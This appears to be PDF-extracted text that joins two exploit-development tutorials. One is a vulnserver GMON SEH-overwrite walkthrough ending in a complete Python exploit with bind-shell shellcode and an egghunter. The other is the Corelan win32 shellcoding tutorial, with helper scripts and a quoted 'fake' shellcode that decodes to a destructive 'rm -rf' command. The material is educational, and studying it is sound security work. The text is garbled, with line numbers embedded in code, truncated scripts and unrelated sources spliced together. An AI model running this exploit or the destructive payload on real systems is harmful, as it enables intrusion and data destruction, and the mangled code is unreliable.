Now that we know the offset, we’ll determine if there are any bad characters. Here comes
another template!
Update the global variables in GMON\id-bad-chars\exploit.py to look like what’s below. Other
than that, everything is good to go!
6OFFSET = 3514
Note: I initially thought I would need to chunk up the bad character testing to fit within the 52
character limit. However, I noticed that ECX was pointing into the byte array at a point that
was greater than 52 (0x3d or 61). This led me to believe I could send the entire byte array and
check that region of memory for comparison instead of chunking the array.
One nice thing about windbg is how you can manipulate the memory panes to look around
based on offsets. We can use this to find the offset to the memory address of our byte array.
Now that we know the offset, we can compare our byte array to that location to check for bad
characters.
assumes you’ve run !py mona ba -cpb '\x00' to generate the .bin file
══════════════════════════════════════════════════════
═════════════════
Hold on...
- Processing modules
- Comparing 1 location(s)
Boom, we know that our shellcode can make it into memory without getting corrupted!
MONA.PY SEH
The common move for an SEH overwrite is to insert a pop pop ret gadget. We can find
instructions that accomplish that goal very easily with mona’s seh command.
The seh command will search for pointers to routines that will lead to code execution in an
SEH overwrite exploit. By default, it will attempt to bypass SafeSEH by excluding pointers from
rebase, aslr and safeseh protected modules. Output will be written into seh.txt
seh will search for the following instruction gadgets (not just pop pop ret):
The output from seh is shown below (truncated for brevity’s sake).
════════════
Hold on...
---------- Mona command started on 2020-05-18 12:12:23 (v2.0, rev 605) ----------
- Processing modules
[+] Setting pointer access level criteria to 'R', to increase search results
- Folder created
[+] Results :
-------------8<-------------
We can take one of the pop pop ret gadget addresses from the output and plug it into
our GMON\final-poc\exploit.py template. While we’re at it, we can update the global
variables. Also, let’s comment out line 54 (adding shellcode to the payload). We already know
there’s not enough room there for the shellcode as it is.
6OFFSET = 3514
With the pop pop ret gadget in place, we’ll throw the updated script. When we do, we’ll get a
message about an Access violation (shown below)
-------------8<-------------
When this happens, we can enter commands into windbg. We’re going to use the opportunity
to use another awesome mona utility.
MONA.PY BPSEH
For the better part of 3 months, I was running !exchain, copying the nseh record, and then
setting a breakpoint on that address. Little did I know that mona turns it into a single
command. It’s a small thing, but it’s a very nice quality of life touch.
sehbp is an alias of bpseh, or vice-versa. either way, just type whatever you can rememebr; it’ll
work!
══════════════
Hold on...
Nr of SEH records : 1
SEH Chain :
-----------
With the breakpoint set, just use the g command and we should hit our pop pop ret.
SHORT JUMP
The next common action in an SEH exploit is to make a short jmp over the gadget you entered
into the nSEH record. We’ll stick to convention and hand-jam a short jump into our PoC.
I don’t want to deep dive on this, there are plenty of great blogs out there that cover SEH
overwrites (this one from @h0mbre is a fine choice!). The TL;DR is that our nSEH gadget
executes which redirects execution to the short jump. The short jump takes us OVER the nseh
gadget into our nop sled.
50-------------8<-------------
55-------------8<-------------
After throwing the updated PoC, we can see the disassembly before we take the jump.
MONA.PY EGG
Now we find ourselves within the 52 bytes of space we identified earlier with findmsp. As
already stated, 52 bytes is not enough for our bind shell payload. We’ll need a way to get our
shellcode into memory and then have execution reach that shellcode. Luckily, there’s plenty of
space in the exploit prior to the seh overwrite (3000+ bytes or so). We’ll insert our shellcode
there along with a unique identifier called an egg.
In the 52 bytes of space, we’ll insert a small piece of code called an egghunter. This small piece
of assembly iterates over memory looking for the egg. When found, it transfers execution to
the address immediately following the egg (our shellcode).
You can check out my x64 Linux Egghunter Shellcode post that details what an egghunter is
and how it accomplishes its task. At a high level, the linux and windows version do the same
thing, they just use different syscalls.
At this point, you shouldn’t be surprised to learn that mona can help with crafting an
egghunter as well. mona’s egg command creates an egghunter routine. If you don’t specify a
file containing shellcode, it will simply produce a regular egghunter routine. By default the tag
(egg) used is w00t, though I’ve chosen to use c0d3.
I’ve run into trouble with the very similar tag W00T. What was happening is that
the T translated to a push esp and the W turned into a push edi. These instructions were
jacking up my shellcode, so I devised my own benign tag for use with egghunters.
The tag c0d3’s disassembly is shown below.
1ndisasm> 65643063
2═════════════════
465 gs
564 fs
630 db 0x30
763 db 0x63
════════════════════
Hold on...
- Folder created
"\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
"\x74\xef\xb8\x63\x30\x64\x33\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff"
"\xe7"
With that done, we’ll need to alter our PoC and add the egghunter.
47-------------8<-------------
48shellcode += b"\xef\x33\xf1"
49
52
53payload = VULNSRVR_CMD
54-------------8<-------------
FINAL POC
Next, we’ll add our egg to the payload. We’ll also include a little wiggle room between the start
of the buffer and the egg. In the same breath, we’ll add our existing shellcode to the payload.
based on how the egghunter works, the egg needs to doubled; c0d3 is added as c0d3c0d3
52-------------8<-------------
53payload = VULNSRVR_CMD
55payload += b"c0d3c0d3"
56payload += shellcode
57-------------8<-------------
After adding in the shellcode variable, we can make sure our payload is of a proper length by
filling the remainder with B’s.
55-------------8<-------------
56payload += shellcode
60-------------8<-------------
Lastly, let’s change our SLED_LENGTH from 20 to 10. This will ensure we have enough room for
our egghunter in the 52 bytes of allowed space.
5-------------8<-------------
6OFFSET = 3514
7SLED_LENGTH = 10
8-------------8<-------------
1import struct
2import socket
3
6OFFSET = 3514
7SLED_LENGTH = 10
10
11# shellcode will work in simple cases, likely will need modification
12# -----
15shellcode = b""
16shellcode += b"\xbb\xed\x65\x39\x9d\xdb\xdb\xd9\x74\x24\xf4"
17shellcode += b"\x58\x33\xc9\xb1\x53\x31\x58\x12\x83\xc0\x04"
18shellcode += b"\x03\xb5\x6b\xdb\x68\xb9\x9c\x99\x93\x41\x5d"
19shellcode += b"\xfe\x1a\xa4\x6c\x3e\x78\xad\xdf\x8e\x0a\xe3"
20shellcode += b"\xd3\x65\x5e\x17\x67\x0b\x77\x18\xc0\xa6\xa1"
21shellcode += b"\x17\xd1\x9b\x92\x36\x51\xe6\xc6\x98\x68\x29"
22shellcode += b"\x1b\xd9\xad\x54\xd6\x8b\x66\x12\x45\x3b\x02"
23shellcode += b"\x6e\x56\xb0\x58\x7e\xde\x25\x28\x81\xcf\xf8"
24shellcode += b"\x22\xd8\xcf\xfb\xe7\x50\x46\xe3\xe4\x5d\x10"
25shellcode += b"\x98\xdf\x2a\xa3\x48\x2e\xd2\x08\xb5\x9e\x21"
26shellcode += b"\x50\xf2\x19\xda\x27\x0a\x5a\x67\x30\xc9\x20"
27shellcode += b"\xb3\xb5\xc9\x83\x30\x6d\x35\x35\x94\xe8\xbe"
28shellcode += b"\x39\x51\x7e\x98\x5d\x64\x53\x93\x5a\xed\x52"
29shellcode += b"\x73\xeb\xb5\x70\x57\xb7\x6e\x18\xce\x1d\xc0"
30shellcode += b"\x25\x10\xfe\xbd\x83\x5b\x13\xa9\xb9\x06\x7c"
31shellcode += b"\x1e\xf0\xb8\x7c\x08\x83\xcb\x4e\x97\x3f\x43"
32shellcode += b"\xe3\x50\xe6\x94\x04\x4b\x5e\x0a\xfb\x74\x9f"
33shellcode += b"\x03\x38\x20\xcf\x3b\xe9\x49\x84\xbb\x16\x9c"
34shellcode += b"\x31\xb3\xb1\x4f\x24\x3e\x01\x20\xe8\x90\xea"
35shellcode += b"\x2a\xe7\xcf\x0b\x55\x2d\x78\xa3\xa8\xce\xb6"
36shellcode += b"\x0d\x24\x28\xdc\x7d\x60\xe2\x48\xbc\x57\x3b"
37shellcode += b"\xef\xbf\xbd\x13\x87\x88\xd7\xa4\xa8\x08\xf2"
38shellcode += b"\x82\x3e\x83\x11\x17\x5f\x94\x3f\x3f\x08\x03"
39shellcode += b"\xb5\xae\x7b\xb5\xca\xfa\xeb\x56\x58\x61\xeb"
40shellcode += b"\x11\x41\x3e\xbc\x76\xb7\x37\x28\x6b\xee\xe1"
41shellcode += b"\x4e\x76\x76\xc9\xca\xad\x4b\xd4\xd3\x20\xf7"
42shellcode += b"\xf2\xc3\xfc\xf8\xbe\xb7\x50\xaf\x68\x61\x17"
43shellcode += b"\x19\xdb\xdb\xc1\xf6\xb5\x8b\x94\x34\x06\xcd"
44shellcode += b"\x98\x10\xf0\x31\x28\xcd\x45\x4e\x85\x99\x41"
45shellcode += b"\x37\xfb\x39\xad\xe2\xbf\x5a\x4c\x26\xca\xf2"
46shellcode += b"\xc9\xa3\x77\x9f\xe9\x1e\xbb\xa6\x69\xaa\x44"
47shellcode += b"\x5d\x71\xdf\x41\x19\x35\x0c\x38\x32\xd0\x32"
48shellcode += b"\xef\x33\xf1"
49
51egghunter =
b"\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x63\
x30\x64\x33\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
52
53payload = VULNSRVR_CMD
55payload += b"c0d3c0d3"
56payload += shellcode
61payload += egghunter
66
67 sent = sock.send(payload)
GETTING A SHELL
If all goes well when we throw the code above, we should see a listener on port 12345 open
up.
══════════════════════
C:\Users\vagrant\Downloads\vulnserver-master>
https://epi052.gitlab.io/notes-to-self/blog/2020-05-18-osce-exam-practice-part-three/
https://github.com/killvxk/Windows-Exploit-Development-practice/blob/master/EFSWS-SEH-
egghunter-shell.py
https://www.slideshare.net/RodolphoConcurde/from-seh-overwrite-with-egg-hunter-to-get-a-
shell-250602117
https://sec4us.com.br/cheatsheet/bufferoverflow-egghunting
Shellcode
http://www.hick.org/code/skape/papers/win32-shellcode.pdf
https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/
Over the last couple of months, I have written a set of tutorials about building exploits that
target the Windows stack. One of the primary goals of anyone writing an exploit is to modify
the normal execution flow of the application and trigger the application to run arbitrary code…
code that is injected by the attacker and that could allow the attacker to take control of the
computer running the application.
This type of code is often called "shellcode", because one of the most used targets of running
arbitrary code is to allow an attacker to get access to a remote shell / command prompt on the
host, which will allow him/her to take further control of the host.
While this type of shellcode is still used in a lot of cases, tools such as Metasploit have taken
this concept one step further and provide frameworks to make this process easier. Viewing
the desktop, sniffing data from the network, dumping password hashes or using the owned
device to attack hosts deeper into the network, are just some examples of what can be done
with the Metasploit meterpreter payload/console. People are creative, that’s for sure… and
that leads to some really nice stuff.
The reality is that all of this is “just” a variation on what you can do with shellcode. That is,
complex shellcode, staged shellcode, but still shellcode.
Usually, when people are in the process of building an exploit, they tend to try to use some
simple/small shellcode first, just to prove that they can inject code and get it executed. The
most well known and commonly used example is spawning calc.exe or something like
that. Simple code, short, fast and does not require a lot of set up to work. (In fact, every time
Windows calculator pops up on my screen, my wife cheers… even when I launched calc myself
:-) )
In order to get a “pop calc” shellcode specimen, most people tend to use the already available
shellcode generators in Metasploit, or copy ready made code from other exploits on the net…
just because it’s available and it works. (Well, I don’t recommend using shellcode that was
found on the net for obvious reasons). Frankly, there’s nothing wrong with Metasploit. In fact
the payloads available in Metasploit are the result of hard work and dedication, sheer
craftsmanship by a lot of people. These guys deserve all respect and credits for that.
Shellcoding is not just applying techniques, but requires a lot of knowledge, creativity and
skills. It is not hard to write shellcode, but it is truly an art to write good shellcode.
In most cases, the Metasploit (and other publicly available) payloads will be able to fulfill your
needs and should allow you to prove your point – that you can own a machine because of a
vulnerability.
Nevertheless, today we’ll look at how you can write your own shellcode and how to get
around certain restrictions that may stop the execution of your code (null bytes et al).
A lot of papers and books have been written on this subject, and some really excellent
websites are dedicated to the subject. But since I want to make this tutorial series as complete
as possible, I decided to combine some of that information, throw in my 2 cents, and write my
own “introduction to win32 shellcoding”.
I think it is really important for exploit builders to understand what it takes to build good
shellcode. The goal is not to tell people to write their own shellcode, but rather to understand
how shellcode works (knowledge that may come handy if you need to figure out why certain
shellcode does not work) , and write their own if there is a specific need for certain shellcode
functionality, or modify existing shellcode if required.
This paper will only cover existing concepts, allowing you to understand what it takes to build
and use custom shellcode… it does not contain any new techniques or new types of shellcode
– but I’m sure you don’t mind at this point.
If you want to read other papers about shellcoding, check out the following links :
• Wikipedia
• Skylined
• Phrack
• Skape
• Amenext.com
• Vividmachines.com
• Didier Stevens
• Harmonysecurity
Every shellcode is nothing more than a little application – a series of instructions written by a
human being, designed to do exactly what that developer wanted it to do. It could be
anything, but it is clear that as the actions inside the shellcode become more complex, the
bigger the final shellcode most likely will become. This will present other challenges (such as
making the code fit into the buffer we have at our disposal when writing the exploit, or just
making the shellcode work reliably… We’ll talk about that later on)
When we look at shellcode in the format it is used in an exploit, we only see bytes. We know
that these bytes form assembly/CPU instructions, but what if we wanted to write our own
shellcode… Do we have to master assembly and write these instructions in asm? Well, it helps
a lot. But if you only want to get your own custom code to execute, one time, on a specific
system, then you may be able to do so with limited asm knowledge. I am not a big asm expert
myself, so if I can do it – you can do it for sure.
Writing shellcode for the Windows platform will require us to use the Windows API’s. How
this impacts the development of reliable shellcode (or shellcode that is portable, that works
across different versions/service packs levels of the OS) will be discussed later in this
document.
• Assembler : nasm
• ActiveState Perl (required to run some of the scripts that are used in this tutorial). I am
using Perl 5.8
• Metasploit
• Skylined alpha3, testival, beta3
int (*func)();
(int)(*func)();
Install all of these tools first before working your way through this tutorial ! Also, keep in mind
that I wrote this tutorial on XP SP3, so some addresses may be different if you are using a
different version of Windows.
In addition to these tools and scripts, you’ll also need some healthy brains, good common
sense and the ability to read/understand/write some basic perl/C code + Basic knowledge
about assembly.
You can download the scripts that will be used in this tutorial here :
Before looking at how shellcode is built, I think it’s important to show some techniques to test
ready-made shellcode or test your own shellcode while you are building it.
Furthermore, this technique can (and should) be used to see what certain shellcode does
before you run it yourself (which really is a requirement if you want to evaluate shellcode that
was taken from the internet somewhere without breaking your own systems)
Usually, shellcode is presented in opcodes, in an array of bytes that is found for example inside
an exploit script, or generated by Metasploit (or generated yourself – see later)
First, we need to convert these bytes into instructions so we can see what it does.
Example 1 :
Suppose you have found this shellcode on the internet and you want to know what it does
before you run the exploit yourself :
char shellcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
Would you trust this code, just because it says that it will spawn calc.exe ?
Let’s see. Use the following script to write the opcodes to a binary file :
pveWritebin.pl :
#!/usr/bin/perl
# http://www.corelan.be
if ($#ARGV ne 0) {
exit(0);
system("del $ARGV[0]");
"file";
#open file in binary mode
open(FILE,">$ARGV[0]");
binmode FILE;
close(FILE);
Paste the shellcode into the perl script and run the script :
#!/usr/bin/perl
# http://www.corelan.be
if ($#ARGV ne 0) {
exit(0);
system("del $ARGV[0]");
my $shellcode="\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20".
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65".
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
open(FILE,">$ARGV[0]");
binmode FILE;
close(FILE);
print "Wrote ".length($shellcode)." bytes to file\n";
Writing to c:\tmp\shellcode.bin
The first thing you should do, even before trying to disassemble the bytes, is look at the
contents of this file. Just looking at the file may already rule out the fact that this may be a
fake exploit or not.
C:\shellcode>type c:\tmp\shellcode.bin
C:\shellcode>
=> hmmm – this one may have caused issues. In fact if you would have run the exploit this
shellcode was taken from, on a Linux system, you may have blown up your own system. (That
is, if a syscall would have called this code and executed it on your system)
Alternatively, you can also use the “strings” command in linux (as explained here). Write the
entire shellcode bytes to a file and then run “strings” on it :
Added on feb 26 2010 : Skylined also pointed out that we can use Testival / Beta3 to evaluate
shellcode as well
Beta3 :
BETA3 --decode \x
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
^Z
Testival can be used to actually run the shellcode – which is – of course – dangerous when you
are trying to find out what some obscure shellcode really does…. but it still will be helpful if
you are testing your own shellcode.
Example 2 :
my $shellcode="\x68\x97\x4C\x80\x7C\xB8".
"\x4D\x11\x86\x7C\xFF\xD0";
Writing to c:\tmp\shellcode.bin
C:\shellcode>type c:\tmp\shellcode.bin
hùLÇ|?M?å| ?
C:\shellcode>
You don’t need to run this code to figure out what it will do.
If the exploit is indeed written for Windows XP Pro SP2 then this will happen :
0:001> d 0x7c804c97
Next, 0x7c86114d is moved into eax and a call eax is made. At 0x7c86114d, we find :
0:001> ln 0x7c86114d
Exact matches:
kernel32!WinExec =
If the “Windows XP Pro SP2” indicator is not right, this will happen (example on XP SP3) :
0:001> d 0x7c804c97
0:001> ln 0x7c86114d
(7c86113a) kernel32!NumaVirtualQueryNode+0x13
| (7c861437) kernel32!GetLogicalDriveStringsW
You can try to simulate the decoder loop by hand, but it will take a long time to do so. You can
also run the code, paying attention to what happens and using breakpoints to block automatic
execution (to avoid disasters).
This technique is not without danger and requires you to stay focused and understand what
the next instruction will do. So I won’t explain the exact steps to do this right now. As you go
through the rest of this tutorial, examples will be given to load shellcode in a debugger and run
it step by step.
• Make sure to put a breakpoint right before the shellcode will be launched, before
running the testshellcode application (you’ll understand what I mean in a few
moments)
• Don’t just run the code. Use F7 (Immunity) to step through each instruction. Every
time you see a call/jmp/… instruction (or anything that would redirect the instruction
to somewhere else), then try to find out first what the call/jmp/… will do before you
run it.
• If a decoder is used in the shellcode, try to locate the place where the original
shellcode is reproduced (this will be either right after the decoder loop or in another
location referenced by one of the registers). After reproducing the original code,
usually a jump to this code will be made or (in case the original shellcode was
reproduced right after the loop), the code will just get executed when a certain
compare operation result changes to what it was during the loop. At that point, do
NOT run the shellcode yet.
• When the original shellcode was reproduced, look at the instructions and try to
simulate what they will do without running the code.
• Be careful and be prepared to wipe/rebuild your system if you get owned anyway :-)
From C to Shellcode
Ok, let’s get really started now. Let’s say we want to build shellcode that displays a
MessageBox with the text “You have been pwned by Corelan”. I know, this may not be very
useful in a real life exploit, but it will show you the basic techniques you need to master before
moving on to writing / modifying more complex shellcode.
To start with, we’ll write the code in C. For the sake of this tutorial, I have decided to use the
lcc-win32 compiler. If you decided to use another compiler then the concepts and final results
should be more or less the same.
Source (corelan1.c) :
#include
MessageBox(NULL,
"Corelan",
MB_OK);
Note : As you can see, I used lcc-win32. The user32.dll library (required for MessageBox)
appeared to get loaded automatically. If you use another compiler, you may need to add a
LoadLibraryA(“user32.dll”); call to make it work.
Open the executable in the decompiler (IDA Free) (load PE Executable). After the analysis has
been completed, this is what you’ll get :
.text:004012D4 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:004012D4
.text:004012D4
.text:004012EF leave
.text:004012F0 retn
.text:004012F0
.text:004012F0 ; ---------------------------------------------------------------------------
004012EF |. C9 LEAVE
004012F0 \. C3 RETN</jmp.&user32.messageboxa>
Ok, what do we see here ?
1. the push ebp and mov ebp, esp instructions are used as part of the stack set up. We may not
need them in our shellcode because we will be running the shellcode inside an already existing
application, and we’ll assume the stack has been set up correctly already. (This may not be
true and in real life you may need to tweak the registers/stack a bit to make your shellcode
work, but that’s out of scope for now)
2. We push the arguments that will be used onto the stack, in reverse order. The Title
(Caption) (0x004040A0) and MessageBox Text (0x004040A8) are taken from the .data section
of our executable:
3. We call the MessageBoxA Windows API (which sits in user32.dll) This API takes its 4
arguments from the stack. In case you used lcc-win32 and didn’t really wonder why
MessageBox worked : You can see that this function was imported from user32.dll by looking
at the “Imports” section in IDA. This is important. We will talk about this later on.
(Alternatively, look at MSDN – you can find the corresponding Microsoft library at the bottom
of the function structure page)
4. We clean up and exit the application. We’ll talk about this later on.
In fact, we are not that far away from converting this to workable shellcode. If we take the
opcode bytes from the output above, we have our basic shellcode. We only need to change a
couple of things to make it work :
• Change the way the strings (“Corelan” as title and “You have been pwned by Corelan”
as text) are put onto the stack. In our example these strings were taken from the .data
section of our C application. But when we are exploiting another application, we
cannot use the .data section of that particular application (because it will contain
something else). So we need to put the text onto the stack ourselves and pass the
pointers to the text to the MessageBoxA function.
• Find the address of the MessageBoxA API and call it directly. Open user32.dll in IDA
Free and look at the functions. On my XP SP3 box, this function can be found at
0x7E4507EA. This address will (most likely) be different on other versions of the OS, or
even other service pack levels. We’ll talk about how to deal with that later in this
document.
So a CALL to 0x7E4507EA will cause the MessageBoxA function to be launched, assuming that
user32.dll was loaded/mapped in the current process. We’ll just assume it was loaded for now
– we’ll talk about loading it dynamically later on.
Converting asm to shellcode : Pushing strings to the stack & returning pointer to the strings
2. Push the hex onto the stack (in reverse order). Don’t forget the null byte at the end of the
string and make sure everything is 4 byte aligned (so add some spaces if necessary)
The following little script will produce the opcodes that will push a string to the stack
(pvePushString.pl) :
#!/usr/bin/perl
# http://www.corelan.be
if ($#ARGV ne 0) {
exit(0);
my $strThisChar="";
my $strThisHex="";
my $cnt=0;
my $bytecnt=0;
my $strHex="";
my $strOpcodes="";
my $strPush="";
$strThisChar=substr($strToPush,$cnt,1);
$strThisHex="\\x".ascii_to_hex($strThisChar);
if ($bytecnt < 3)
$strHex=$strHex.$strThisHex;
$bytecnt=$bytecnt+1;
else
$strPush = $strHex.$strThisHex;
$strPush =~ tr/\\x//d;
$strHex=chr(34)."\\x68".$strHex.$strThisHex.chr(34).
substr($strPush,2,2).substr($strPush,0,2);
$strOpcodes=$strHex."\n".$strOpcodes;
$strHex="";
$bytecnt=0;
}
$cnt=$cnt+1;
#last line
if (length($strHex) > 0)
$strHex=$strHex."\\x20";
$strPush = $strHex;
$strPush =~ tr/\\x//d;
substr($strPush,4,2).substr($strPush,2,2).substr($strPush,0,2);
$strOpcodes=$strHex."\n".$strOpcodes;
else
$strOpcodes=chr(34)."\\x68\\x20\\x20\\x20\\x00".chr(34).
print $strOpcodes;
return $str;
Example :
C:\shellcode>perl pvePushString.pl
usage: pvePushString.pl "String to put on stack"
String length : 7
String length : 30
Just pushing the text to the stack will not be enough. The MessageBoxA function (just like
other windows API functions) expects a pointer to the text, not the text itself.. so we’ll have to
take this into account. The other 2 parameters however (hWND and Buttontype) should not
be pointers, but just 0. So we need a different approach for those 2 parameters.
int MessageBox(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
);
=> hWnd and uType are values taken from the stack, lpText and lpCaption are pointers to
strings.
• put our strings on the stack and save the pointers to each text string in a register. So
after pushing a string to the stack, we will save the current stack position in a register.
We’ll use ebx for storing the pointer to the Caption text, and ecx for the pointer to the
messagebox text. Current stack position = ESP. So a simple mov ebx,esp or mov
ecx,esp will do.
• set one of the registers to 0, so we can push it to the stack where needed (used as
parameter for hWND and Button). Setting a register to 0 is as easy as performing XOR
on itself (xor eax,eax)
• put the zero’s and addresses in the registers (pointing to the strings) on the stack in
the right order, in the right place
• call MessageBox (which will take the 4 first addresses from the stack and use the
content of those registers as parameters to the MessageBox function)
In addition to that, when we look at the MessageBox function in user32.dll, we see this :
Apparently the parameters are taken from a location referred to by an offset from EBP
(between EBP+8 and EBP+14). And EBP is populated with ESP at 0x7E4507ED. So that means
we need to make sure our 4 parameters are positioned exactly at that location. This means
that, based on the way we are pushing the strings onto the stack, we may need to push 4 more
bytes to the stack before jumping to the MessageBox API. (Just run things through a debugger
and you’ll find out what to do)
ok, here we go :
char code[] =
"\x68\x61\x6e\x20\x00" // Push
"\x68\x62\x79\x20\x43" // = Text
"\x68\x6e\x65\x64\x20" //
"\x68\x6e\x20\x70\x77" //
"\x68\x20\x62\x65\x65" //
"\x68\x68\x61\x76\x65" //
"\x68\x59\x6f\x75\x20" //
"\x53"
"\x51"
"\x50"
//to make sure the parameters are read from the right
//offset
Note : you can get the opcodes for simple instructions using the !pvefindaddr PyCommand for
Immunity Debugger.
Example :
Alternatively, you can use nasm_shell from the Metasploit tools folder to assemble instructions
into opcode :
xxxx@bt4:/pentest/exploits/framework3/tools# ./nasm_shell.rb
Back to the shellcode. Paste this c array in the “shellcodetest.c” application (see c source in
the “Basics” section of this post), make and compile.
Then load the shellcodetest.exe application in Immunity Debugger and set a breakpoint where
the main() function begins (in my case, this is 0x004012D4). Then press F9 and the debugger
should hit the breakpoint.
Now step through (F7), and at a certain point, a call to [ebp-4] is made. This is the call to
executing our shellcode – corresponding with the (int)(*func)(); statement in our C source.
Right after this call is made, the CPU view in the debugger looks like this :
This is indeed our shellcode. First we push “Corelan” to the stack and we save the address in
EBX. Then we push the other string to the stack and save the address in ECX.
Next, we clear eax (set eax to 0), and then we push 4 parameters to the stack : first zero (push
eax), then pointer to the Title (push ebx), then pointer to the MessageText (push ecx), then
zero again (push eax). Then we push another 4 bytes to the stack (alignment). Finally we put
the address of MessageBoxA into ESI and we jump to ESI.
Press F7 until JMP ESI is reached and executed. Right after JMP ESI is made, look at the stack :
That is exactly what we expected. Continue to press F7 until you have reached the CALL
USER32.MessageBoxExA instruction (just after the 5 PUSH operations, which push the
parameters to the stack). The stack should now (again) point to the correct parameters)
Another way to test our shellcode is by using skylined’s “Testival” tool. Just write the shellcode
to a bin file (using pveWritebin.pl), and then run Testival. We’ll assume you have written the
code to shellcode.bin :
(don’t be surprised that this command will just produce a crash – I will explain why that
happens in a little while)
Unfortunately not. There are some MAJOR issues with our shellcode :
1. The shellcode calls the MessageBox function, but does not properly clean up/exit after
the function has been called. So when the MessageBox function returns, the parent
process may just die/crash instead of exiting properly (or instead of not crashing at all,
in case of a real exploit). Ok, this is not a major issue, but it still can be an issue.
2. The shellcode contains null bytes. So if we want to use this shellcode in a real exploit,
that targets a string buffer overflow, it may not work because the null bytes act as a
string terminator. That is a major issue indeed.
3. The shellcode worked because user32.dll was mapped in the current process. If
user32.dll is not loaded, the API address of MessageBoxA won’t point to the function,
and the code will fail. Major issue – showstopper.
4. The shellcode contains a static reference to the MessageBoxA function. If this address
is different on other Windows Versions/Service Packs, then the shellcode won’t work.
Major issue again – showstopper.
Number 3 is the main reason why the w32-testival command didn’t work for our shellcode. In
the w32-testival process, user32.dll is not loaded, so the shellcode fails.
Shellcode exitfunc
In our C application, after calling the MessageBox API, 2 instructions were used to exit the
process : LEAVE and RET. While this works fine for standalone applications, our shellcode will
be injected into another application. So a leave/ret after calling the MessageBox will most
likely break stuff and cause a “big” crash.
There are 2 approaches to exit our shellcode : we can either try to kill things as silently as we
can, but perhaps we can also try to keep the parent (exploited) process running… perhaps it
can be exploited again.
Obviously, if there is a specific reason not to exit the shellcode/process at all, then feel free not
to do so.
I’ll discuss 3 techniques that can be used to exit the shellcode with :
• seh : this one will force an exception call. Keep in mind that this one might trigger the
exploit code to run over and over again (if the original bug was SEH based for example)
Obviously, none of these techniques ensures that the parent process won’t crash or will
remain exploitable once it has been exploited. I’m only discussing the 3 techniques (which,
incidentally, are availabe in Metasploit too :-))
ExitProcess()
This technique is based on a Windows API called “ExitProcess”, found in kernel32.dll. One
parameter : the ExitProcess exitcode. This value (zero means everything was ok) must be
placed on the stack before calling the API
or, in byte/opcode :
Again, we’ll just assume that kernel32.dll is mapped/loaded automatically (which will be the
case – see later), so you can just call the ExitProcess API without further ado.
SEH
A second technique to exit the shellcode (while trying to keep the parent process running) is
by triggering an exception (by performing call 0x00) – something like this :
xor eax,eax
call eax
While this code is clearly shorter than the others, it may lead to unpredictable results. If an
exception handler is set up, and you are taking advantage of the exception handler in your
exploit (SEH based exploit), then the shellcode may loop. That may be ok in certain cases (if,
for example, you are trying to keep a machine exploitable instead of exploit it just once)
ExitThread()
Instead of looking up the address of this function using IDA, you can also use arwin, a little
script written by Steve Hanna
So simply replacing the call to ExitProcess with a call to ExitThread will do the job.
As explained above, you can use IDA or arwin to get functions/function pointers. If you have
installed Microsoft Visual Studio C++ Express, then you can use dumpbin as well. This
command line utility can be found at C:\Program Files\Microsoft Visual Studio 9.0\VC\bin.
Before you can use the utility you’ll need to get a copy of mspdb80.dll (download here) and
place it in the same (bin) folder.
You can now list all exports (functions) in a given dll : dumpbin path_to_dll /exports
Populating all exports from all dll’s in the windows\system32 folder can be done like this :
rem https://www.corelan.be
rem
@echo off
cls
>> exports.log
(put everything after the “for /f” statement on one line – I just added some line breaks for
readability purposes)
Save this batch file in the bin folder. Run the batch file, and you will end up with a text file that
has all the exports in all dll’s in the system32 folder. So if you ever need a certain function, you
can simply search through the text file. (Keep in mind, the addresses shown in the output are
RVA (relative virtual addresses), so you’ll need to add the base address of the module/dll to
get the absolute address of a given function)
In the previous chapters we went from one line of C code to a set of assembler instructions.
Once you start to become familiar to these assembler instructions, it may become easier to
just write stuff directly in assembly and compile that into opcodes, instead of resolving the
opcodes first and writing everything directly in opcode… That’s way to hard and there is an
easier way :
Create a text file that starts with [BITS 32] (don’t forget this or nasm may not be able to detect
that it needs to compile for 32 bit CPU x86), followed by the assembly instructions (which
could be found in the disassembly/debugger output):
[BITS 32]
PUSH 0x65726f43
PUSH 0x6c65726f
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
PUSH EAX
MOV EAX,0x7c81CB12
Now use the pveReadbin.pl script to output the bytes from the .bin file in C format:
#!/usr/bin/perl
# http://www.corelan.be
if ($#ARGV ne 0) {
exit(0);
binmode FILE;
$strContent="";
my $cnt=0;
$offset += $n;
close(FILE);
my $cnt=0;
my $nullbyte=0;
print chr(34);
if ($cnt < 8)
print "\\x".$str1.$str2;
$cnt=$cnt+1;
else
$cnt=1;
print chr(34)."\n".chr(34)."\\x".$str1.$str2;
{
$nullbyte=$nullbyte+1;
print chr(34).";\n";
Output :
C:\shellcode>pveReadbin.pl msgbox.bin
Reading msgbox.bin
Read 78 bytes
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
